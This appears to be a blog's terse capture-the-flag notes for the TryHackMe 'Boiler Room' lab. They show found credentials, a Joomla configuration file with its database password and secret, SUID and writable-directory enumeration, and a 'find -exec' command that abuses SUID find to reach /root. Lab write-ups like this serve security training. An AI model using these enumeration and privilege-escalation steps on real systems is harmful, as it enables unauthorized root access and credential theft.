- username: `basterd`
- password: `superduperp@$$`
superduperp@$$
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'THM Boiler Room';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $debug_lang_const = '1';
public $dbtype = 'mysqli';
public $host = '127.0.0.1';
public $user = 'joomlauser';
public $password = 'passwordz';
public $db = 'joomladb';
public $dbprefix = 'wyot4_';
public $live_site = '';
public $secret = '5O2SmJUZB24rhcfL';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
public $ftp_host = '';
public $ftp_port = '';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $mailonline = '1';
public $mailer = 'mail';
public $mailfrom = 'admin@example.com';
public $fromname = 'THM Boiler Room';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $cache_platformprefix = '0';
public $MetaDesc = '';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $MetaVersion = '0';
public $robots = '';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $feed_email = 'none';
public $log_path = '/var/www/html/joomla/administrator/logs';
public $tmp_path = '/var/www/html/joomla/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
}
stoner
find / -user root -perm -4000 -executable -type f 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
stoner@Vulnerable:~$ cd /usr/bin
stoner@Vulnerable:/usr/bin$ ls
find / -writable -type d 2>/dev/null
/home/stoner
/home/stoner/.nano
/tmp
/tmp/.Test-unix
/tmp/.XIM-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.font-unix
/var/tmp
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/crash
/dev/mqueue
/dev/shm
/proc/1644/task/1644/fd
/proc/1644/fd
/proc/1644/map_files
/run/lock
find /root -exec ls /root \;
'호그와트' 카테고리의 다른 글
| 포ㄹ트를 뽀트르 포트르 포트리스 뽀로로 (0) | 2024.08.18 |
|---|---|
| 윌의 마음을 이해하는 건 니체를 읽으며 타노스 고기를 뜯어먹을때 온다 (0) | 2024.08.03 |
| 판다의 고기는 원래 맛있다 (0) | 2024.07.26 |
| Why did CrowdStrike IT outage happen ? (brief summary) (0) | 2024.07.24 |
| Shocker HTB solving (0) | 2024.07.24 |